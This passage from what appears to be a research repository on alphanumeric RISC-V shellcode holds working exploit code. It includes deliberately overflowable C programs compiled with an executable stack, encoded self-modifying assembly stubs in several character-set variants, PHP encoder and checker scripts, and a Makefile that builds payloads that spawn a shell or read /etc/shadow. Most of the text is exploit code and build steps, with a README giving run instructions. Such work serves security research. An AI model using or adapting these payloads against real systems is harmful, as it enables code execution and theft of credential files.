128 |     lui a0,0x38614
129 |     li s4,13
130 |     sra t1,a0,s4
131 |     addiw t1,t1,-10
132 |     sd t1, 1930(sp)
133 |     # Loading 0x705 in x20
134 |     lui a0,0x30705
135 |     li s4,12
136 |     sra s4,a0,s4
137 |     sd s4, 1932(sp)
138 |     # Loading 0x69e3 in x6
139 |     lui a0,0x4d393
140 |     li s4,13
141 |     sra t1,a0,s4
142 |     addiw t1,t1,26
143 |     sd t1, 1934(sp)
144 |     # Loading 0xfff7 in x6
145 |     lui t1,0x10
146 |     addiw t1,t1,-2
147 |     addiw t1,t1,-7
148 |     sd t1, 1936(sp)
149 |     # Loading 0x100f in x6
150 |     lui t1,0x11
151 |     addiw t1,t1,-10
152 |     addiw t1,t1,25
153 |     sd t1, 1938(sp)
154 |     next_block
155 |     # Loading 0x0 in x20
156 |     lui s4,0x10
157 |     sd s4, 1924(sp)
158 |     # Loading 0x9682 in x20
159 |     lui t1,0x39682
160 |     li s2,12
161 |     sra s4,t1,s2
162 |     sd s4, 1926(sp)
163 | step5:
164 |     end_nopsled
165 | step6:
166 |     csrc mip,sp
167 | 


--------------------------------------------------------------------------------
/fedora/main.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #define _GNU_SOURCE
 7 | #include <stdlib.h>
 8 | #include <stdio.h>
 9 | #include <stdint.h>
10 | #include <string.h>
11 | 
12 | uint64_t shellcode(void);
13 | 
14 | __attribute__((weak))
15 | uint64_t func2(const char *in, void **array, int offset) {
16 |     char name[300];
17 | 
18 |     strcpy(name, in); /* Blatant SO incoming */
19 |     name[sizeof(name)-1] = '\0';
20 |     array[offset] = name;
21 | 
22 |     return strlen(name);
23 | }
24 | 
25 | __attribute__((weak))
26 | uint64_t func1(const char *bad, int size) {
27 |     uint8_t arr[992];
28 |     if(size < 972) {
29 |         memset(arr, size, sizeof(arr));
30 |         return func1(bad, size+1);
31 |     }
32 |     return func2(bad, (void **)arr, -1);
33 | }
34 | 
35 | int main(void) {
36 |     puts("Hello world from the buggy program on HifiveU board.");
37 |     puts("Waiting for input...");
38 | 
39 |     char *bad = NULL; size_t n;
40 |     ssize_t status = __getline(&bad, &n, stdin);
41 |     if(status == -1) {
42 |         fprintf(stderr, "getline failed\n");
43 |         exit(1);
44 |     }
45 |     //printf("line:%s\n", bad);
46 | 
47 |     puts("Processing data...");
48 |     uint64_t ret = func1(bad, 0);
49 | 
50 |     free(bad);
51 |     printf("Exiting from shellcode (%#lx).\n", ret);
52 |     return 0;
53 | }
54 | 


--------------------------------------------------------------------------------
/fedora/slash.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | .macro dangerous_nop2
  7 |  li t1,-2
  8 | .endm
  9 | .macro xp_fixup
 10 |     # n464:0 n448:26
 11 |     addi sp, sp, 448
 12 |     addi sp, sp, 448
 13 |     addi sp, sp, 448
 14 |     addi sp, sp, 448
 15 |     addi sp, sp, 448
 16 |     addi sp, sp, 448
 17 |     addi sp, sp, 448
 18 |     addi sp, sp, 448
 19 |     addi sp, sp, 448
 20 |     addi sp, sp, 448
 21 |     addi sp, sp, 448
 22 |     addi sp, sp, 448
 23 |     addi sp, sp, 448
 24 |     addi sp, sp, 448
 25 |     addi sp, sp, 448
 26 |     addi sp, sp, 448
 27 |     addi sp, sp, 448
 28 |     addi sp, sp, 448
 29 |     addi sp, sp, 448
 30 |     addi sp, sp, 448
 31 |     addi sp, sp, 448
 32 |     addi sp, sp, 448
 33 |     addi sp, sp, 448
 34 |     addi sp, sp, 448
 35 |     addi sp, sp, 448
 36 |     addi sp, sp, 448
 37 | .endm
 38 | .macro end_nopsled
 39 |     # len:8
 40 |     dangerous_nop2
 41 |     dangerous_nop2
 42 |     dangerous_nop2
 43 |     dangerous_nop2
 44 |     dangerous_nop2
 45 |     dangerous_nop2
 46 |     dangerous_nop2
 47 |     dangerous_nop2
 48 | .endm
 49 | step0:
 50 |     dangerous_nop2
 51 |     dangerous_nop2
 52 |     .word 0x2F302F6F
 53 | load_values:
 54 |     .dword 0x4A33304242424242
 55 |     .dword 0x4242424242424242
 56 |     .dword 0x4A43504242424242
 57 | payload_pool:
 58 |     .include PAYLOAD_FILE
 59 | step1:
 60 |     sra s2, zero, s3
 61 |     sra sp, t5, s2
 62 | step2:
 63 |     ld s4, 16(sp)
 64 |     amoand.d a6, s4, (sp)
 65 |     amoand.d a6, s4, (sp)
 66 |     li s4, 12
 67 |     sra tp, a6, s4
 68 |     sra s4, zero, s3
 69 |     amoand.d.rl zero, s4, (sp)
 70 |     amoor.d.aq a6, tp, (sp)
 71 |     amoand.w t5, s4, (sp)
 72 |     amoor.d tp, s4, (sp)
 73 | step3:
 74 |     xp_fixup
 75 | step4:
 76 | .macro init_block
 77 |     sra s4, zero, s3
 78 |     amoand.d.rl zero, s4, (sp)
 79 |     amoor.d.aq  a6, tp, (sp)
 80 | .endm
 81 | .macro next_block
 82 |     .short 0x6141
 83 | .endm
 84 |     init_block
 85 |     # Loading fenci
 86 |     lui     a0,0x412f3
 87 |     li      s4,18
 88 |     sra     t1,a0,s4
 89 |     addiw   t1,t1,-20
 90 |     addiw   t1,t1,-20
 91 |     addiw   t1,t1,-20
 92 |     amoor.w.aq t5,t1,(sp)
 93 |     next_block
 94 |     init_block
 95 |     # Loading 0x777d
 96 |     lui a0,0x57783
 97 |     li  s4,12
 98 |     sra t1,a0,s4
 99 |     addiw   t1,t1,-6
100 |     amoor.w.aq t5,t1,(sp)
101 |     next_block
102 |     init_block
103 |     # Loading 0x970a
104 |     lui a0,0x59714
105 |     li  s4,12
106 |     sra t1,a0,s4
107 |     addiw   t1,t1,-10
108 |     amoor.w.aq t5,t1,(sp)
109 |     next_block
110 |     init_block
111 |     # Loading 0x45c1
112 |     lui a0,0x51704
113 |     li  s4,14
114 |     sra s4,a0,s4
115 |     amoor.w    t5,s4,(sp)
116 |     next_block
117 |     init_block
118 |     # Loading 0x59a
119 |     lui a0,0x41673
120 |     li  s4,14
121 |     sra t1,a0,s4
122 |     addiw   t1,t1,-2
123 |     amoor.w.aq t5,t1,(sp)
124 |     next_block
125 |     init_block
126 |     # Loading 0x853a
127 |     lui a0,0x58544
128 |     li  s4,12
129 |     sra t1,a0,s4
130 |     addiw   t1,t1,-10
131 |     amoor.w.aq t5,t1,(sp)
132 |     next_block
133 |     init_block
134 |     # Loading 0x86ba
135 |     lui a0,0x586c4
136 |     li  s4,12
137 |     sra t1,a0,s4
138 |     addiw   t1,t1,-10
139 |     amoor.w.aq t5,t1,(sp)
140 |     next_block
141 |     init_block
142 |     # Loading 0x4140
143 |     lui a0,0x50503
144 |     li  s4,14
145 |     sra s4,a0,s4
146 |     amoor.w    t5,s4,(sp)
147 |     next_block
148 |     init_block
149 |     # Loading 0x87a2
150 |     lui t5,0x587a2
151 |     li  s2,12
152 |     sra s4,t5,s2
153 |     amoor.w    t5,s4,(sp)
154 |     next_block
155 |     init_block
156 |     # Loading 0x8391
157 |     lui a0,0x30723
158 |     li  s4,13
159 |     sra s4,a0,s4
160 |     amoor.w    t5,s4,(sp)
161 |     next_block
162 |     init_block
163 |     # Loading 0x509
164 |     lui a0,0x41424
165 |     li  s4,14
166 |     sra s4,a0,s4
167 |     amoor.w    t5,s4,(sp)
168 |     next_block
169 |     init_block
170 |     # Loading 0x8c3d
171 |     lui t5,0x2f462
172 |     li  s2,12
173 |     addiw   s2,s2,-5
174 |     sra t1,t5,s2
175 |     addiw   t1,t1,-3
176 |     amoor.w.aq t5,t1,(sp)
177 |     next_block
178 |     init_block
179 |     # Loading 0xc300
180 |     lui a0,0x38614
181 |     li  s4,13
182 |     sra t1,a0,s4
183 |     addiw   t1,t1,-10
184 |     amoor.w.aq t5,t1,(sp)
185 |     next_block
186 |     init_block
187 |     # Loading 0x705
188 |     lui a0,0x50705
189 |     li  s4,12
190 |     sra s4,a0,s4
191 |     amoor.w    t5,s4,(sp)
192 |     next_block
193 |     init_block
194 |     # Loading 0x15f9
195 |     lui a0,0x51613
196 |     li  s4,12
197 |     sra t1,a0,s4
198 |     addiw   t1,t1,-10
199 |     addiw   t1,t1,-16
200 |     amoor.w.aq t5,t1,(sp)
201 |     next_block
202 |     init_block
203 |     # Loading 0xf1c1
204 |     lui t5,0x2f2f2
205 |     li  s2,12
206 |     addiw   s2,s2,-8
207 |     sra t1,t5,s2
208 |     addiw   t1,t1,-10
209 |     addiw   t1,t1,-13
210 |     addiw   t1,t1,-20
211 |     addiw   t1,t1,-20
212 |     amoor.w.aq t5,t1,(sp)
213 |     next_block
214 |     init_block
215 |     # Loading fenci
216 |     lui     a0,0x412f3
217 |     li      s4,18
218 |     sra     t1,a0,s4
219 |     addiw   t1,t1,-20
220 |     addiw   t1,t1,-20
221 |     addiw   t1,t1,-20
222 |     amoor.w.aq t5,t1,(sp)
223 |     next_block
224 |     init_block
225 |     # Loading 0x9682
226 |     lui t5,0x39682
227 |     li  s2,12
228 |     sra s4,t5,s2
229 |     amoor.w    t5,s4,(sp)
230 |     next_block
231 | step5:
232 |     end_nopsled
233 | step6:
234 |     csrc mip,sp
235 | 


--------------------------------------------------------------------------------
/fedora/tick.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | .global shellcode
  7 | shellcode:
  8 | 
  9 | .macro dangerous_nop2
 10 |     li t1,-2
 11 | .endm
 12 | .macro xp_fixup
 13 |     # n464:5 n448:15
 14 |     addi sp, sp, 464
 15 |     addi sp, sp, 464
 16 |     addi sp, sp, 464
 17 |     addi sp, sp, 464
 18 |     addi sp, sp, 464
 19 |     addi sp, sp, 448
 20 |     addi sp, sp, 448
 21 |     addi sp, sp, 448
 22 |     addi sp, sp, 448
 23 |     addi sp, sp, 448
 24 |     addi sp, sp, 448
 25 |     addi sp, sp, 448
 26 |     addi sp, sp, 448
 27 |     addi sp, sp, 448
 28 |     addi sp, sp, 448
 29 |     addi sp, sp, 448
 30 |     addi sp, sp, 448
 31 |     addi sp, sp, 448
 32 |     addi sp, sp, 448
 33 |     addi sp, sp, 448
 34 | .endm
 35 | .macro end_nopsled
 36 |     # len:0
 37 | .endm
 38 | step0:
 39 |     .rept 144
 40 |         dangerous_nop2
 41 |     .endr
 42 |     .word 0x2730276F
 43 | stage2_pool:
 44 |     .8byte 0x4242424242424242
 45 |     .8byte 0x4242424242424242
 46 |     .8byte 0x4242424242424242
 47 |     .8byte 0x4242424242424242
 48 |     .8byte 0x4242424242424242
 49 |     .8byte 0x4242424242424242
 50 |     .8byte 0x4261447a6f314233 # 48 # ADD_3A
 51 |     .8byte 0x42627073717a5a42 # 56 # ADD_1B
 52 |     .8byte 0x4242424242424242
 53 |     .8byte 0x4242424242424242
 54 |     .8byte 0x4261706e69633436 # 80 # ADD_2A
 55 |     .8byte 0x4242424242424242
 56 |     .8byte 0x4242424242424242
 57 |     .8byte 0x4261447a31356775 # 104 # ADD_3B
 58 |     .8byte 0x413166346e514956 # 112 # MUL_2
 59 |     .8byte 0x426132356a4b6e31 # 120 # ADD_2B
 60 |     .8byte 0x4242424242424242
 61 |     .8byte 0x4242424242424242
 62 |     .8byte 0x4242424242424242
 63 |     .8byte 0x4242424242424242
 64 |     .8byte 0x4131706f64596870 # 160 # MUL_4
 65 |     .8byte 0x4261336f596c5239 # 168 # ADD_4A
 66 |     .8byte 0x4131352778497450 # 176 # MUL_3
 67 |     .8byte 0x4131567a47714b4d # 184 # MUL_1
 68 |     .8byte 0x4242424242424242
 69 |     .8byte 0x4242424242424242
 70 |     .8byte 0x4242424242424242
 71 |     .8byte 0x4242424242424242
 72 |     .8byte 0x4242424242424242
 73 |     .8byte 0x4242424242424242
 74 |     .8byte 0x4131555555555555 # 240 # FIX
 75 |     .8byte 0x426358466535524c # 248 # ADD_1A
 76 | payload_pool:
 77 |     .include PAYLOAD_FILE
 78 | step1:
 79 |     sra s4, zero, s3
 80 |     sra sp, a4, s4
 81 | step2:
 82 |                      #Role [Can]
 83 |     fld fa0, 48(sp)  #ADD_3A [AM]
 84 |     fld fa2, 56(sp)  #ADD_1B [AM]
 85 |     fld fa4, 80(sp)  #ADD_2A [AM]
 86 |     fld fa6, 112(sp) #MUL_2 [ M]
 87 |     fld fs0, 120(sp) #ADD_2B [AM]
 88 |     fld fs2, 176(sp) #MUL_3 [ M]
 89 |     fld ft2, 184(sp) #MUL_1 [ M]
 90 |     fld ft4, 240(sp) #FIX [ M]
 91 |     fld ft6, 248(sp) #ADD_1A [AM]
 92 | step3:
 93 |     xp_fixup
 94 | step4:
 95 | .macro next_block
 96 |     .short 0x6141
 97 | .endm
 98 | .macro fblock op, dstr, mulr, addr, store_offset, round=rup
 99 |     fm\op\().d \dstr, \mulr, ft4, \addr, \round
100 |     fsd \dstr, \store_offset(sp)
101 | .endm
102 |     fblock add, ft6, ft2, ft6, 1952
103 |     fblock add, ft6, ft2, fa2, 1958
104 |     fblock sub, ft6, fa6, fa4, 1964
105 |     fblock sub, ft6, fa6, fs0, 1970
106 |     next_block
107 |     fld fa2, 104(a4) #ADD_3B [AM]
108 |     fld fa4, 160(a4) #MUL_4 [AM]
109 |     fld fa1, 168(a4) #ADD_4A [A ]
110 |     fblock sub, ft6, fs2, fa0, 1960
111 |     fblock sub, ft6, fs2, fa2, 1966
112 |     fblock sub, ft6, fa4, fa1, 1970
113 | step5:
114 |     end_nopsled
115 | step6:
116 |     csrc mip,sp
117 | 


--------------------------------------------------------------------------------
/hifiveu/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | out
3 | 


--------------------------------------------------------------------------------
/hifiveu/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | RV_ABI    := rv64gc
 7 | include ../scripts/common.mk
 8 | OUT := out
 9 | 
10 | all: $(BUILD)/vuln.bin \
11 |      $(OUT)/hello_hash.txt  $(OUT)/hello_slash.txt  $(OUT)/hello_tick.txt \
12 |      $(OUT)/shell_hash.txt  $(OUT)/shell_slash.txt  $(OUT)/shell_tick.txt \
13 |      $(OUT)/shadow_hash.txt $(OUT)/shadow_slash.txt $(OUT)/shadow_tick.txt
14 | 
15 | $(BUILD):
16 | 	$(Q)mkdir -p $@
17 | 
18 | $(OUT):
19 | 	$(Q)mkdir -p $@
20 | 
21 | $(BUILD)/vuln.bin: $(BUILD)/main.o
22 | 	$(Q)$(GCC) -Wl,-N -z execstack -o $@.nostrip $^
23 | 	@#riscv64-unknown-elf-objcopy --set-section-flags .text=contents,alloc,load,code $< $@
24 | 	@#riscv64-unknown-elf-strip $@.nostrip -o $@
25 | 	@cp $@.nostrip $@
26 | 
27 | $(BUILD)/main.o: main.c | $(BUILD)
28 | 	$(Q)$(GCC) -o $@ -c $< -Wall -Wextra -O2
29 | 
30 | include ../payload/payload.mk
31 | 
32 | # $1: user-friendly name
33 | # $2: check regex
34 | # $3: encode p arg
35 | # $4: encode v arg
36 | # $5: payload
37 | # $6: shellcode-flavour
38 | define build_shellcode =
39 | $(BUILD)/shellcode_$1.o: $6.S $(BUILD)/$1.encoded
40 | 	$(Q)$(GCC) $(ASFLAGS) -o $$@ -c $$< -DPAYLOAD_FILE="\"$$(word 2,$$^)\""
41 | 
42 | $(BUILD)/$1.encoded: $(BUILD)/$5.bin encode.php
43 | 	$(Q)php $$(word 2,$$^) -i $$< -o $$@ -p $3 -v $4
44 | 
45 | $(BUILD)/shellcode_$1.txt: $(BUILD)/shellcode_$1.o
46 | 	$(Q)$(OBJCOPY) -O binary $$< $$@
47 | 
48 | $(OUT)/$1.txt: $(BUILD)/shellcode_$1.txt check.php | $(OUT)
49 | 	$(Q)php $$(word 2,$$^) -i $$< -c $2
50 | 	$(Q)cp $$< $$@
51 | endef
52 | 
53 | # $1: payload
54 | # $2: user-friendly name
55 | define build_shellcode_family =
56 | $(eval $(call build_payload,$1,0x40000,$(BUILD)/$1.bin))
57 | 
58 | $(eval $(call build_shellcode,$2_hash, "A-Za-z0-9#", 10798,0x1414,$1,hash))
59 | $(eval $(call build_shellcode,$2_slash,"A-Za-z0-9\/",10966,0x1E8C,$1,slash))
60 | $(eval $(call build_shellcode,$2_tick, "A-Za-z0-9\'",10606,0x1264,$1,tick))
61 | endef
62 | 
63 | $(eval $(call build_shellcode_family,payload_linux_hello,hello))
64 | $(eval $(call build_shellcode_family,payload_linux_shell,shell))
65 | $(eval $(call build_shellcode_family,payload_linux_etc_shadow,shadow))
66 | 
67 | .PHONY: clean
68 | clean:
69 | 	rm -rf $(BUILD) $(OUT)
70 | 


--------------------------------------------------------------------------------
/hifiveu/README.txt:
--------------------------------------------------------------------------------
 1 | This folder contains the demos running on Linux on the HiFive Unleashed board.
 2 | 
 3 | How to use:
 4 | 1- Build the project: `make`
 5 | 2- Copy the following files on the HiFive Unleashed board:
 6 |    - `build/vuln.bin`
 7 |    - `out/hash.txt`
 8 |    - `out/slash.txt`
 9 |    - `out/tick.txt`
10 | 3- Run the demos:
11 |    `./vuln.bin < hash.txt`
12 |    `./vuln.bin < slash.txt`
13 |    `./vuln.bin < tick.txt`
14 | 


--------------------------------------------------------------------------------
/hifiveu/check.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	$args = getopt('i:c:');
 9 | 
10 | 	$f = file_get_contents($args['i']);
11 | 
12 | 	$regex = "/[".$args['c']."]/";
13 | 
14 | 	/* For debug */
15 | 	function not_alnum_verbose(&$f, $regex) {
16 | 		$len = strlen($f);
17 | 		for ($i=0; $i<$len; $i++) {
18 | 			$c = $f[$i];
19 | 			if (preg_replace($regex, '', $c) !== '') {
20 | 				printf("Not alnum (0x%x)!\n", $i);
21 | 				return;
22 | 			}
23 | 		}
24 | 	}
25 | 
26 | 	if (preg_replace($regex, '', $f) !== '') {
27 | 		not_alnum_verbose($f, $regex);
28 | 		//exit(0); /* For dev */
29 | 		exit(1);
30 | 	}
31 | ?>


--------------------------------------------------------------------------------
/hifiveu/encode.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | 	function error($errno, $errstr, $errfile, $errline) {
 9 | 		throw new ErrorException($errstr, $errno, 0, $errfile, $errline);
10 | 	}
11 | 	set_error_handler('error');
12 | 
13 | 	$args = getopt('i:o:p:v:');
14 | 
15 | 	$p = file_get_contents($args['i']); /* Input file */
16 | 	$pool_size = intval($args['p']); /* Pool size (in bytes) */
17 | 	$payload_offset = intval($args['v'], 0); /* Payload offset (in bytes) */
18 | 	$maxpayload = 0x400; /* It is possible to increase it with minor work */
19 | 
20 | 	$payload_size = strlen($p);
21 | 	if($payload_size > $maxpayload) {
22 | 		printf("Payload too large: %d/%d\n", strlen($p), $maxpayload);
23 | 		exit(-1);
24 | 	}
25 | 
26 | 	$s = ".fill ". $payload_offset .", 1, 0x42\n";
27 | 	printf("insert: %d bytes from offset:0x%x\n", 2*$payload_size, $payload_offset);
28 | 	for($i = 0 ; $i<min($maxpayload, $payload_size); $i++)
29 | 	{
30 | 		/* [Notation: capital letters are hex digits]
31 | 		 * We want to encode byte 'XY' in alnum bytes 'KA' 'LB'.
32 | 		 * The equation to solve (see stage2.S) is:
33 | 		 * XY == KA ^ BK, ('XY'€[0;255], 'KA' and 'LB' alnum]
34 | 		 */
35 | 		$q = ord($p[$i]);
36 | 		$wanted_bottom  = $q & 0xF;
37 | 		$wanted_top = ($q >> 4) & 0xF;
38 | 
39 | 		$low_top = 0x4;
40 | 		if($wanted_bottom == 0x4) {
41 | 			$low_top = 0x6;
42 | 		}
43 | 		$low_bottom = $wanted_bottom ^ $low_top;
44 | 
45 | 		$high_bottom = $wanted_top ^ $low_top;
46 | 		$high_top = ($high_bottom == 0) ? 0x5 : 0x4;
47 | 
48 | 		$low  = ($low_top << 4) + $low_bottom;
49 | 		$high = ($high_top << 4) + $high_bottom;
50 | 
51 | 		$s .= sprintf(".short 0x%02x%02x\n", $high, $low);
52 | 	}
53 | 
54 | 	$pool_size -= $payload_offset + 2*$payload_size;
55 | 	if($pool_size > 0) {
56 | 		$s .= ".fill ". $pool_size .", 1, 0x42\n";
57 | 	}
58 | 	file_put_contents($args['o'], $s);
59 | ?>
60 | 


--------------------------------------------------------------------------------
/hifiveu/hash.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | .global shellcode
  7 | shellcode:
  8 | 
  9 | .macro dangerous_nop2
 10 |  li t1,-2
 11 | .endm
 12 | .macro xp_fixup
 13 |     # n464:15 n448:5
 14 |     addi sp, sp, 464
 15 |     addi sp, sp, 464
 16 |     addi sp, sp, 464
 17 |     addi sp, sp, 464
 18 |     addi sp, sp, 464
 19 |     addi sp, sp, 464
 20 |     addi sp, sp, 464
 21 |     addi sp, sp, 464
 22 |     addi sp, sp, 464
 23 |     addi sp, sp, 464
 24 |     addi sp, sp, 464
 25 |     addi sp, sp, 464
 26 |     addi sp, sp, 464
 27 |     addi sp, sp, 464
 28 |     addi sp, sp, 464
 29 |     addi sp, sp, 448
 30 |     addi sp, sp, 448
 31 |     addi sp, sp, 448
 32 |     addi sp, sp, 448
 33 |     addi sp, sp, 448
 34 | .endm
 35 | .macro end_nopsled
 36 |     # len:0
 37 | .endm
 38 | step0:
 39 |  .word 0x2330236F
 40 | payload_pool:
 41 |     .include PAYLOAD_FILE
 42 | step1:
 43 |     sra s4, zero, s3
 44 |     sra sp, t1, s4
 45 | step3:
 46 |     xp_fixup
 47 | step4:
 48 | .macro next_block
 49 |     .short 0x6141
 50 | .endm
 51 |     # Loading 0x100f in x6
 52 |     lui t1,0x11
 53 |     addiw t1,t1,-10
 54 |     addiw t1,t1,25
 55 |     sd t1, 1920(sp)
 56 |     # Loading 0x0 in x20
 57 |     lui s4,0x10
 58 |     sd s4, 1922(sp)
 59 |     # Loading 0x777d in x6
 60 |     lui a0,0x37763
 61 |     li s4,12
 62 |     sra t1,a0,s4
 63 |     addiw t1,t1,26
 64 |     sd t1, 1924(sp)
 65 |     # Loading 0x970a in x6
 66 |     lui a0,0x396f4
 67 |     li s4,12
 68 |     sra t1,a0,s4
 69 |     addiw t1,t1,22
 70 |     sd t1, 1926(sp)
 71 |     # Loading 0xf93 in x6
 72 |     lui a0,0x7a233
 73 |     li s4,19
 74 |     sra t1,a0,s4
 75 |     addiw t1,t1,19
 76 |     addiw t1,t1,30
 77 |     addiw t1,t1,30
 78 |     sd t1, 1928(sp)
 79 |     # Loading 0x4007 in x6
 80 |     lui t1,0x14
 81 |     addiw t1,t1,-10
 82 |     addiw t1,t1,17
 83 |     sd t1, 1930(sp)
 84 |     # Loading 0x853a in x6
 85 |     lui a0,0x38524
 86 |     li s4,12
 87 |     sra t1,a0,s4
 88 |     addiw t1,t1,22
 89 |     sd t1, 1932(sp)
 90 |     # Loading 0x86ba in x6
 91 |     lui a0,0x386a4
 92 |     li s4,12
 93 |     sra t1,a0,s4
 94 |     addiw t1,t1,22
 95 |     sd t1, 1934(sp)
 96 |     # Loading 0x4140 in x20
 97 |     lui a0,0x50503
 98 |     li s4,14
 99 |     sra s4,a0,s4
100 |     sd s4, 1936(sp)
101 |     # Loading 0x87a2 in x20
102 |     lui t1,0x387a2
103 |     li s2,12
104 |     sra s4,t1,s2
105 |     sd s4, 1938(sp)
106 |     next_block
107 |     # Loading 0x8391 in x20
108 |     lui a0,0x30723
109 |     li s4,13
110 |     sra s4,a0,s4
111 |     sd s4, 1924(sp)
112 |     # Loading 0x509 in x20
113 |     lui a0,0x41424
114 |     li s4,14
115 |     sra s4,a0,s4
116 |     sd s4, 1926(sp)
117 |     # Loading 0x8c3d in x6
118 |     lui t1,0x23462
119 |     li s2,12
120 |     addiw s2,s2,-5
121 |     sra t1,t1,s2
122 |     addiw t1,t1,-3
123 |     sd t1, 1928(sp)
124 |     # Loading 0xc300 in x6
125 |     lui a0,0x38614
126 |     li s4,13
127 |     sra t1,a0,s4
128 |     addiw t1,t1,-10
129 |     sd t1, 1930(sp)
130 |     # Loading 0x705 in x20
131 |     lui a0,0x30705
132 |     li s4,12
133 |     sra s4,a0,s4
134 |     sd s4, 1932(sp)
135 |     # Loading 0x69e3 in x6
136 |     lui a0,0x4d393
137 |     li s4,13
138 |     sra t1,a0,s4
139 |     addiw t1,t1,26
140 |     sd t1, 1934(sp)
141 |     # Loading 0xfff7 in x6
142 |     lui t1,0x10
143 |     addiw t1,t1,-2
144 |     addiw t1,t1,-7
145 |     sd t1, 1936(sp)
146 |     # Loading 0x100f in x6
147 |     lui t1,0x11
148 |     addiw t1,t1,-10
149 |     addiw t1,t1,25
150 |     sd t1, 1938(sp)
151 |     next_block
152 |     # Loading 0x0 in x20
153 |     lui s4,0x10
154 |     sd s4, 1924(sp)
155 |     # Loading 0x9682 in x20
156 |     lui t1,0x39682
157 |     li s2,12
158 |     sra s4,t1,s2
159 |     sd s4, 1926(sp)
160 | step5:
161 |     end_nopsled
162 | step6:
163 |     csrc mip,sp
164 | 


--------------------------------------------------------------------------------
/hifiveu/main.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #define _GNU_SOURCE
 7 | #include <stdlib.h>
 8 | #include <stdio.h>
 9 | #include <stdint.h>
10 | #include <string.h>
11 | 
12 | uint64_t shellcode(void);
13 | 
14 | __attribute__((weak))
15 | uint64_t func2(const char *in, void **array, int offset) {
16 |     char name[300];
17 | 
18 |     strcpy(name, in); /* Blatant SO incoming */
19 |     name[sizeof(name)-1] = '\0';
20 |     array[offset] = name;
21 | 
22 |     return strlen(name);
23 | }
24 | 
25 | __attribute__((weak))
26 | uint64_t func1(const char *bad, int size) {
27 |     uint8_t arr[1024];
28 |     if(size < 1024) {
29 |         memset(arr, size, sizeof(arr));
30 |         return func1(bad, size+1);
31 |     }
32 |     return func2(bad, (void **)arr, -1);
33 | }
34 | 
35 | int main(void) {
36 |     puts("Hello world from the buggy program on HifiveU board.");
37 |     puts("Waiting for input...");
38 | 
39 |     char *bad = NULL; size_t n;
40 |     ssize_t status = __getline(&bad, &n, stdin);
41 |     if(status == -1) {
42 |         fprintf(stderr, "getline failed\n");
43 |         exit(1);
44 |     }
45 |     //printf("line:%s\n", bad);
46 | 
47 |     puts("Processing data...");
48 |     uint64_t ret = func1(bad, 0);
49 | 
50 |     free(bad);
51 |     printf("Exiting from shellcode (%#lx).\n", ret);
52 |     return 0;
53 | }
54 | 


--------------------------------------------------------------------------------
/hifiveu/slash.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | .macro dangerous_nop2
  7 |  li t1,-2
  8 | .endm
  9 | .macro xp_fixup
 10 |     # n464:0 n448:26
 11 |     addi sp, sp, 448
 12 |     addi sp, sp, 448
 13 |     addi sp, sp, 448
 14 |     addi sp, sp, 448
 15 |     addi sp, sp, 448
 16 |     addi sp, sp, 448
 17 |     addi sp, sp, 448
 18 |     addi sp, sp, 448
 19 |     addi sp, sp, 448
 20 |     addi sp, sp, 448
 21 |     addi sp, sp, 448
 22 |     addi sp, sp, 448
 23 |     addi sp, sp, 448
 24 |     addi sp, sp, 448
 25 |     addi sp, sp, 448
 26 |     addi sp, sp, 448
 27 |     addi sp, sp, 448
 28 |     addi sp, sp, 448
 29 |     addi sp, sp, 448
 30 |     addi sp, sp, 448
 31 |     addi sp, sp, 448
 32 |     addi sp, sp, 448
 33 |     addi sp, sp, 448
 34 |     addi sp, sp, 448
 35 |     addi sp, sp, 448
 36 |     addi sp, sp, 448
 37 | .endm
 38 | .macro end_nopsled
 39 |     # len:8
 40 |     dangerous_nop2
 41 |     dangerous_nop2
 42 |     dangerous_nop2
 43 |     dangerous_nop2
 44 |     dangerous_nop2
 45 |     dangerous_nop2
 46 |     dangerous_nop2
 47 |     dangerous_nop2
 48 | .endm
 49 | step0:
 50 |     dangerous_nop2
 51 |     dangerous_nop2
 52 |     .word 0x2F302F6F
 53 | load_values:
 54 |     .dword 0x4A33304242424242
 55 |     .dword 0x4242424242424242
 56 |     .dword 0x4A43504242424242
 57 | payload_pool:
 58 |     .include PAYLOAD_FILE
 59 | step1:
 60 |     sra s2, zero, s3
 61 |     sra sp, t5, s2
 62 | step2:
 63 |     ld s4, 16(sp)
 64 |     amoand.d a6, s4, (sp)
 65 |     amoand.d a6, s4, (sp)
 66 |     li s4, 12
 67 |     sra tp, a6, s4
 68 |     sra s4, zero, s3
 69 |     amoand.d.rl zero, s4, (sp)
 70 |     amoor.d.aq a6, tp, (sp)
 71 |     amoand.w t5, s4, (sp)
 72 |     amoor.d tp, s4, (sp)
 73 | step3:
 74 |     xp_fixup
 75 | step4:
 76 | .macro init_block
 77 |     sra s4, zero, s3
 78 |     amoand.d.rl zero, s4, (sp)
 79 |     amoor.d.aq  a6, tp, (sp)
 80 | .endm
 81 | .macro next_block
 82 |     .short 0x6141
